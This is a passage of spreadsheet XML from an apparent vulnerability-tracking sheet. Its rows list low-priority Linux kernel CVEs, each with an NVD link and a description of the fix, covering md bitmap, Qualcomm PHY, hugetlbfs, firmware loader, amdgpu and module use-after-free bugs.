md_llbitmap_io_wq. However, daemon_work can still be queued or running
after the timer has been deleted, and the daemon path can arm
pending_timer again when it finds dirty chunks that are not ready to
flush yet.
If that happens during teardown, pending_timer can remain armed after
llbitmap is freed and later dereference freed memory.
Add a BITMAP_SHUTDOWN bit to llbitmap-&gt;flags, set it before deleting
the timer, and make the timer and daemon paths stop queueing or rearming
work once teardown starts. Cancel daemon_work before flushing the shared
workqueue so no already queued daemon instance can race with the free.
Use timer_shutdown_sync() so a daemon instance that passed the shutdown
check before teardown cannot rearm the timer afterward.
BITMAP_SHUTDOWN is a runtime-only state. Mask it out when reading and
updating the llbitmap superblock so the shutdown state is never loaded
from disk or persisted to disk.</t>
        </is>
      </c>
      <c r="T644" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90276</t>
        </is>
      </c>
    </row>
    <row r="645">
      <c r="A645" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B645" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C645" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90277</t>
        </is>
      </c>
      <c r="D645" s="5" t="inlineStr"/>
      <c r="E645" s="5" t="inlineStr"/>
      <c r="F645" s="5" t="inlineStr"/>
      <c r="G645" s="5" t="inlineStr"/>
      <c r="H645" s="5" t="inlineStr"/>
      <c r="I645" s="5" t="inlineStr"/>
      <c r="J645" s="5" t="inlineStr"/>
      <c r="K645" s="5" t="inlineStr"/>
      <c r="L645" s="5" t="inlineStr"/>
      <c r="M645" s="5" t="inlineStr"/>
      <c r="N645" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O645" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P645" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q645" s="5" t="inlineStr"/>
      <c r="R645" s="5" t="inlineStr"/>
      <c r="S645" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
md/md-llbitmap: prevent create failure bitmap UAF
llbitmap_create() publishes mddev-&gt;bitmap before reading the bitmap
superblock. This is needed because llbitmap_read_sb() can initialize a
new bitmap and flush it through helpers that use mddev-&gt;bitmap.
If llbitmap_read_sb() fails, the old cleanup dropped bitmap_info.mutex
and freed llbitmap before clearing mddev-&gt;bitmap. Readers such as
/proc/mdstat rely on bitmap_info.mutex to keep the bitmap pointer stable
while collecting bitmap stats, so they could observe the stale pointer
after the failed create path released the mutex.
Clear mddev-&gt;bitmap while still holding bitmap_info.mutex, then free the
failed llbitmap after dropping the mutex. This makes mutex-protected
readers see either a live bitmap or no bitmap.</t>
        </is>
      </c>
      <c r="T645" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90277</t>
        </is>
      </c>
    </row>
    <row r="646">
      <c r="A646" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B646" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C646" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90278</t>
        </is>
      </c>
      <c r="D646" s="5" t="inlineStr"/>
      <c r="E646" s="5" t="inlineStr"/>
      <c r="F646" s="5" t="inlineStr"/>
      <c r="G646" s="5" t="inlineStr"/>
      <c r="H646" s="5" t="inlineStr"/>
      <c r="I646" s="5" t="inlineStr"/>
      <c r="J646" s="5" t="inlineStr"/>
      <c r="K646" s="5" t="inlineStr"/>
      <c r="L646" s="5" t="inlineStr"/>
      <c r="M646" s="5" t="inlineStr"/>
      <c r="N646" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O646" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P646" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q646" s="5" t="inlineStr"/>
      <c r="R646" s="5" t="inlineStr"/>
      <c r="S646" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
md: wait for behind writes before destroying bitmap
__md_stop() destroyed the bitmap before calling mddev_detach(). That made
mddev_detach() skip bitmap_ops-&gt;wait_behind_writes(), because the bitmap
was already disconnected from mddev.
This was still safe for the legacy bitmap because bitmap_destroy() waits
for behind writes itself. llbitmap keeps that wait in its
-&gt;wait_behind_writes() operation instead, while -&gt;destroy() tears down the
llbitmap storage. With the old ordering, RAID1 behind-write completions
could still run after llbitmap storage had been freed.
Call mddev_detach() before md_bitmap_destroy() so the common detach path
can wait for behind writes while the bitmap is still alive. Only destroy
the bitmap after those users are gone.</t>
        </is>
      </c>
      <c r="T646" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90278</t>
        </is>
      </c>
    </row>
    <row r="647">
      <c r="A647" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B647" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C647" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90279</t>
        </is>
      </c>
      <c r="D647" s="5" t="inlineStr"/>
      <c r="E647" s="5" t="inlineStr"/>
      <c r="F647" s="5" t="inlineStr"/>
      <c r="G647" s="5" t="inlineStr"/>
      <c r="H647" s="5" t="inlineStr"/>
      <c r="I647" s="5" t="inlineStr"/>
      <c r="J647" s="5" t="inlineStr"/>
      <c r="K647" s="5" t="inlineStr"/>
      <c r="L647" s="5" t="inlineStr"/>
      <c r="M647" s="5" t="inlineStr"/>
      <c r="N647" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O647" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P647" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q647" s="5" t="inlineStr"/>
      <c r="R647" s="5" t="inlineStr"/>
      <c r="S647" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
md/raid5: round bitmap stripes with sector division
raid5_bitmap_sector_map() aligns the array range to full RAID5 stripe
widths before converting it to component sectors. That width is
chunk_sectors multiplied by the number of data disks, and it is not
always a power of two.
Reproduce with a 4-disk RAID5, 1024-sector chunks, and three data disks.
The full-stripe width is 3072 sectors. For a one-sector write at array
sector 3072, correct rounding gives array range [3072, 6144), which maps
to component range [1024, 2048). The old round_down()/round_up() logic
instead gives [1024, 4096), which maps to [0, 1024).
Use sector_div() based arithmetic so the rounded range is aligned to the
actual RAID5 stripe width.
The deterministic mapper test now reports the fixed component range as
[1024, 2048), while the old mask-based range was [0, 1024).</t>
        </is>
      </c>
      <c r="T647" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90279</t>
        </is>
      </c>
    </row>
    <row r="648">
      <c r="A648" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B648" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C648" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90280</t>
        </is>
      </c>
      <c r="D648" s="5" t="inlineStr"/>
      <c r="E648" s="5" t="inlineStr"/>
      <c r="F648" s="5" t="inlineStr"/>
      <c r="G648" s="5" t="inlineStr"/>
      <c r="H648" s="5" t="inlineStr"/>
      <c r="I648" s="5" t="inlineStr"/>
      <c r="J648" s="5" t="inlineStr"/>
      <c r="K648" s="5" t="inlineStr"/>
      <c r="L648" s="5" t="inlineStr"/>
      <c r="M648" s="5" t="inlineStr"/>
      <c r="N648" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O648" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P648" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q648" s="5" t="inlineStr"/>
      <c r="R648" s="5" t="inlineStr"/>
      <c r="S648" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
phy: qcom: qmp-usb: Fix possible NULL-deref on early runtime suspend
There is a small window where the runtime suspend callback may run
after pm_runtime_enable() and before pm_runtime_forbid(). In this
case, a crash occurs because runtime suspend/resume dereferences
qmp-&gt;phy pointer, which is not yet initialized:
        `if (!qmp-&gt;phy-&gt;init_count) {`
This can also happen if user re-enables runtime-pm via the sysfs
attribute before qmp phy is initialized.
Similarly to other qcom phy drivers, introduce a qmp-&gt;phy_initialized
variable that can be used to avoid relying on the possibly uninitialized
phy pointer.</t>
        </is>
      </c>
      <c r="T648" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90280</t>
        </is>
      </c>
    </row>
    <row r="649">
      <c r="A649" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B649" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C649" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90281</t>
        </is>
      </c>
      <c r="D649" s="5" t="inlineStr"/>
      <c r="E649" s="5" t="inlineStr"/>
      <c r="F649" s="5" t="inlineStr"/>
      <c r="G649" s="5" t="inlineStr"/>
      <c r="H649" s="5" t="inlineStr"/>
      <c r="I649" s="5" t="inlineStr"/>
      <c r="J649" s="5" t="inlineStr"/>
      <c r="K649" s="5" t="inlineStr"/>
      <c r="L649" s="5" t="inlineStr"/>
      <c r="M649" s="5" t="inlineStr"/>
      <c r="N649" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O649" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P649" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q649" s="5" t="inlineStr"/>
      <c r="R649" s="5" t="inlineStr"/>
      <c r="S649" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
phy: qcom: snps-femto-v2: Fix possible NULL-deref on early runtime suspend
Runtime PM must be enabled before creating the PHY, since phy_create()
only enables runtime PM on the PHY device if it is already enabled on
this parent device. However, the runtime PM callbacks dereference the
hsphy instance, which is not yet ready, leaving a window where a suspend
callback may trigger a NULL pointer dereference.
Take a runtime PM usage reference with pm_runtime_get_noresume() before
enabling runtime PM and release it once the PHY has been created, so that
no runtime suspend can run before the PHY is ready. This also prevents a
short window where an unnecessary runtime suspend can occur.
Use the devres-managed version to ensure PM runtime is symmetrically
disabled during driver removal for proper cleanup.</t>
        </is>
      </c>
      <c r="T649" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90281</t>
        </is>
      </c>
    </row>
    <row r="650">
      <c r="A650" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B650" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C650" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90282</t>
        </is>
      </c>
      <c r="D650" s="5" t="inlineStr"/>
      <c r="E650" s="5" t="inlineStr"/>
      <c r="F650" s="5" t="inlineStr"/>
      <c r="G650" s="5" t="inlineStr"/>
      <c r="H650" s="5" t="inlineStr"/>
      <c r="I650" s="5" t="inlineStr"/>
      <c r="J650" s="5" t="inlineStr"/>
      <c r="K650" s="5" t="inlineStr"/>
      <c r="L650" s="5" t="inlineStr"/>
      <c r="M650" s="5" t="inlineStr"/>
      <c r="N650" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O650" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P650" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q650" s="5" t="inlineStr"/>
      <c r="R650" s="5" t="inlineStr"/>
      <c r="S650" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
phy: qcom: qmp-usb-legacy: Fix possible NULL-deref on early runtime suspend
There is a small window where the runtime suspend callback may run
after pm_runtime_enable() and before pm_runtime_forbid(). In this
case, a crash occurs because runtime suspend/resume dereferences
qmp-&gt;phy pointer, which is not yet initialized:
        `if (!qmp-&gt;phy-&gt;init_count) {`
This can also happen if user re-enables runtime-pm via the sysfs
attribute before qmp phy is initialized.
Similarly to other qcom phy drivers, introduce a qmp-&gt;phy_initialized
variable that can be used to avoid relying on the possibly uninitialized
phy pointer.</t>
        </is>
      </c>
      <c r="T650" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90282</t>
        </is>
      </c>
    </row>
    <row r="651">
      <c r="A651" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B651" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C651" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90283</t>
        </is>
      </c>
      <c r="D651" s="5" t="inlineStr"/>
      <c r="E651" s="5" t="inlineStr"/>
      <c r="F651" s="5" t="inlineStr"/>
      <c r="G651" s="5" t="inlineStr"/>
      <c r="H651" s="5" t="inlineStr"/>
      <c r="I651" s="5" t="inlineStr"/>
      <c r="J651" s="5" t="inlineStr"/>
      <c r="K651" s="5" t="inlineStr"/>
      <c r="L651" s="5" t="inlineStr"/>
      <c r="M651" s="5" t="inlineStr"/>
      <c r="N651" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O651" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P651" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q651" s="5" t="inlineStr"/>
      <c r="R651" s="5" t="inlineStr"/>
      <c r="S651" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
hugetlbfs: release subpool on fill_super failure
hugetlbfs_fill_super() allocates a hugepage subpool when size or min_size
mount options are specified.  hugepage_new_subpool() may also reserve huge
pages for min_size.
If root dentry creation fails after the subpool is created, the failure
path frees the subpool with kfree().  This bypasses hugepage_put_subpool()
and can leave min_size reservations charged.
Use hugepage_put_subpool() on the failure path, matching the normal
put_super path.</t>
        </is>
      </c>
      <c r="T651" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90283</t>
        </is>
      </c>
    </row>
    <row r="652">
      <c r="A652" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B652" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C652" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90284</t>
        </is>
      </c>
      <c r="D652" s="5" t="inlineStr"/>
      <c r="E652" s="5" t="inlineStr"/>
      <c r="F652" s="5" t="inlineStr"/>
      <c r="G652" s="5" t="inlineStr"/>
      <c r="H652" s="5" t="inlineStr"/>
      <c r="I652" s="5" t="inlineStr"/>
      <c r="J652" s="5" t="inlineStr"/>
      <c r="K652" s="5" t="inlineStr"/>
      <c r="L652" s="5" t="inlineStr"/>
      <c r="M652" s="5" t="inlineStr"/>
      <c r="N652" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O652" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P652" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q652" s="5" t="inlineStr"/>
      <c r="R652" s="5" t="inlineStr"/>
      <c r="S652" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
firmware_loader: do not queue completed sysfs fallback requests
fw_load_sysfs_fallback() calls device_add() before adding the fw_priv to
pending_fw_head. device_add() publishes the fallback loading interface, so
a userspace helper which discovers the device by scanning sysfs can write 0
to the loading attribute and complete the request before it is queued as
pending.
In that interleaving firmware_loading_store() calls fw_state_done() while
pending_list still points to itself, so it cannot remove an entry from
pending_fw_head. The subsequent unconditional list_add() then queues an
already-completed fw_priv. Once the request is released, pending_fw_head
can retain a pointer to freed memory and the next fallback request can
fault while validating the list.
Only in-flight fallback requests need suspend or reboot abort handling. If
the request is already DONE after device_add(), return success from the
fallback path without sending another uevent, waiting again, or queueing it
as pending. This preserves the invariant that pending_fw_head contains only
active fallback requests.</t>
        </is>
      </c>
      <c r="T652" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90284</t>
        </is>
      </c>
    </row>
    <row r="653">
      <c r="A653" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B653" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C653" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90285</t>
        </is>
      </c>
      <c r="D653" s="5" t="inlineStr"/>
      <c r="E653" s="5" t="inlineStr"/>
      <c r="F653" s="5" t="inlineStr"/>
      <c r="G653" s="5" t="inlineStr"/>
      <c r="H653" s="5" t="inlineStr"/>
      <c r="I653" s="5" t="inlineStr"/>
      <c r="J653" s="5" t="inlineStr"/>
      <c r="K653" s="5" t="inlineStr"/>
      <c r="L653" s="5" t="inlineStr"/>
      <c r="M653" s="5" t="inlineStr"/>
      <c r="N653" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O653" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P653" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q653" s="5" t="inlineStr"/>
      <c r="R653" s="5" t="inlineStr"/>
      <c r="S653" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
scsi: qla2xxx: Remove redundant VPD flash read in sysfs read path
qla2x00_sysfs_read_vpd() called ha-&gt;isp_ops-&gt;read_optrom() a second time
after releasing optrom_mutex. The repeated read is redundant and, unlike
the first, runs without optrom_mutex held, exposing flash access to
concurrent optrom operations. Drop the duplicate call.</t>
        </is>
      </c>
      <c r="T653" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90285</t>
        </is>
      </c>
    </row>
    <row r="654">
      <c r="A654" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B654" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C654" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90286</t>
        </is>
      </c>
      <c r="D654" s="5" t="inlineStr"/>
      <c r="E654" s="5" t="inlineStr"/>
      <c r="F654" s="5" t="inlineStr"/>
      <c r="G654" s="5" t="inlineStr"/>
      <c r="H654" s="5" t="inlineStr"/>
      <c r="I654" s="5" t="inlineStr"/>
      <c r="J654" s="5" t="inlineStr"/>
      <c r="K654" s="5" t="inlineStr"/>
      <c r="L654" s="5" t="inlineStr"/>
      <c r="M654" s="5" t="inlineStr"/>
      <c r="N654" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O654" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P654" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q654" s="5" t="inlineStr"/>
      <c r="R654" s="5" t="inlineStr"/>
      <c r="S654" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/amdgpu/gfx6: Use PFP on the compute queues too
On GFX6, the compute rings use the same CP path as
the graphics ring. The only difference is that they
don't support draw commands. (As opposed to GFX7 and
newer which have a separate command parser that is
called MEC for compute queues.)
This means that we have to take into consideration
that the PFP also exists on compute queues on GFX6:
Use PFP for register writes on both graphics and
compute queues.
In the pipeline sync, use the PFP to wait for the
previous fence (and not the ME) to prevent the PFP
from starting to execute the next submission while
the ME is still in the previous submission.
After a VM flush, emit PFP_SYNC_ME on compute
queues as well.</t>
        </is>
      </c>
      <c r="T654" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90286</t>
        </is>
      </c>
    </row>
    <row r="655">
      <c r="A655" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B655" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C655" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90287</t>
        </is>
      </c>
      <c r="D655" s="5" t="inlineStr"/>
      <c r="E655" s="5" t="inlineStr"/>
      <c r="F655" s="5" t="inlineStr"/>
      <c r="G655" s="5" t="inlineStr"/>
      <c r="H655" s="5" t="inlineStr"/>
      <c r="I655" s="5" t="inlineStr"/>
      <c r="J655" s="5" t="inlineStr"/>
      <c r="K655" s="5" t="inlineStr"/>
      <c r="L655" s="5" t="inlineStr"/>
      <c r="M655" s="5" t="inlineStr"/>
      <c r="N655" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O655" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P655" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q655" s="5" t="inlineStr"/>
      <c r="R655" s="5" t="inlineStr"/>
      <c r="S655" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
phy: sunplus: fix error handling in sp_uphy_init()
Fix the error paths of sp_uphy_init() to undo exactly what each stage
did: return directly if clk_prepare_enable() fails, release only the clock
if reset_control_deassert() fails, and jump to err_reset if
update_disc_vol() fails so the clock and reset are not leaked.</t>
        </is>
      </c>
      <c r="T655" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90287</t>
        </is>
      </c>
    </row>
    <row r="656">
      <c r="A656" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B656" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C656" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90288</t>
        </is>
      </c>
      <c r="D656" s="5" t="inlineStr"/>
      <c r="E656" s="5" t="inlineStr"/>
      <c r="F656" s="5" t="inlineStr"/>
      <c r="G656" s="5" t="inlineStr"/>
      <c r="H656" s="5" t="inlineStr"/>
      <c r="I656" s="5" t="inlineStr"/>
      <c r="J656" s="5" t="inlineStr"/>
      <c r="K656" s="5" t="inlineStr"/>
      <c r="L656" s="5" t="inlineStr"/>
      <c r="M656" s="5" t="inlineStr"/>
      <c r="N656" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O656" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P656" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q656" s="5" t="inlineStr"/>
      <c r="R656" s="5" t="inlineStr"/>
      <c r="S656" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
phy: renesas: rcar-gen2: Fix double of_node_put on phy creation failure
for_each_child_of_node_scoped() releases the node reference on scope
exit, so the explicit of_node_put(np) in the devm_phy_create() error
path drops it twice.
Drop the redundant of_node_put() and let the scoped cleanup handle it.</t>
        </is>
      </c>
      <c r="T656" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90288</t>
        </is>
      </c>
    </row>
    <row r="657">
      <c r="A657" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B657" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C657" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90289</t>
        </is>
      </c>
      <c r="D657" s="5" t="inlineStr"/>
      <c r="E657" s="5" t="inlineStr"/>
      <c r="F657" s="5" t="inlineStr"/>
      <c r="G657" s="5" t="inlineStr"/>
      <c r="H657" s="5" t="inlineStr"/>
      <c r="I657" s="5" t="inlineStr"/>
      <c r="J657" s="5" t="inlineStr"/>
      <c r="K657" s="5" t="inlineStr"/>
      <c r="L657" s="5" t="inlineStr"/>
      <c r="M657" s="5" t="inlineStr"/>
      <c r="N657" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O657" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P657" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q657" s="5" t="inlineStr"/>
      <c r="R657" s="5" t="inlineStr"/>
      <c r="S657" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/amd/display: Resize MST HDCP per-connector arrays to 32
AMDGPU_DM_MAX_DISPLAY_INDEX is 31. It suggest a maximum number of
32 connectors. But the way it's used is like MAX_DISPLAY_COUNT.
Hence we're off by one with DRM core, which supports a max of 32
connectors.
Rename AMDGPU_DM_MAX_DISPLAY_INDEX to AMDGPU_DM_MAX_DISPLAY_COUNT
to match its actual use, and increase the size to 32 to match the
originally intended size.</t>
        </is>
      </c>
      <c r="T657" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90289</t>
        </is>
      </c>
    </row>
    <row r="658">
      <c r="A658" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B658" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C658" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90290</t>
        </is>
      </c>
      <c r="D658" s="5" t="inlineStr"/>
      <c r="E658" s="5" t="inlineStr"/>
      <c r="F658" s="5" t="inlineStr"/>
      <c r="G658" s="5" t="inlineStr"/>
      <c r="H658" s="5" t="inlineStr"/>
      <c r="I658" s="5" t="inlineStr"/>
      <c r="J658" s="5" t="inlineStr"/>
      <c r="K658" s="5" t="inlineStr"/>
      <c r="L658" s="5" t="inlineStr"/>
      <c r="M658" s="5" t="inlineStr"/>
      <c r="N658" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O658" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P658" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q658" s="5" t="inlineStr"/>
      <c r="R658" s="5" t="inlineStr"/>
      <c r="S658" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
arm64: hibernate: Restore DAIF state on error
Sashiko AI has reported that if swsusp_mte_save_tags() for some reason
fails we return from swsusp_arch_suspend() with DAIF being masked -
that is not what we'd expect. Restore the saved DAIF state before
returning from the error path.</t>
        </is>
      </c>
      <c r="T658" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90290</t>
        </is>
      </c>
    </row>
    <row r="659">
      <c r="A659" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B659" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C659" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90291</t>
        </is>
      </c>
      <c r="D659" s="5" t="inlineStr"/>
      <c r="E659" s="5" t="inlineStr"/>
      <c r="F659" s="5" t="inlineStr"/>
      <c r="G659" s="5" t="inlineStr"/>
      <c r="H659" s="5" t="inlineStr"/>
      <c r="I659" s="5" t="inlineStr"/>
      <c r="J659" s="5" t="inlineStr"/>
      <c r="K659" s="5" t="inlineStr"/>
      <c r="L659" s="5" t="inlineStr"/>
      <c r="M659" s="5" t="inlineStr"/>
      <c r="N659" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O659" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P659" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q659" s="5" t="inlineStr"/>
      <c r="R659" s="5" t="inlineStr"/>
      <c r="S659" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
module/dups: Fix use-after-free in kmod_dup_req lifetime handling
The kmod dups code uses RCU to ensure that a kmod_dup_req instance is freed
only after it is no longer referenced. When releasing an instance, the
kmod_dup_request_delete() function removes the kmod_dup_req from the
dup_kmod_reqs list, waits via synchronize_rcu() and finally frees it.
However, this doesn't work correctly because parallel users referencing the
instance in kmod_dup_request_exists_wait() don't enter an RCU read-side
critical section. This can result in a use-after-free.
The kmod_dup_request_exists_wait() function may need to hold a valid
reference to a kmod_dup_req instance across a blocking wait until the
corresponding modprobe command completes. This makes it unsuitable for RCU.
Fix the issue by changing the lifecycle management of kmod_dup_req to use
reference counting.</t>
        </is>
      </c>
      <c r="T659" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90291</t>
        </is>
      </c>
    </row>
    <row r="660">
      <c r="A660" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B660" s="5" t="inlineStr">
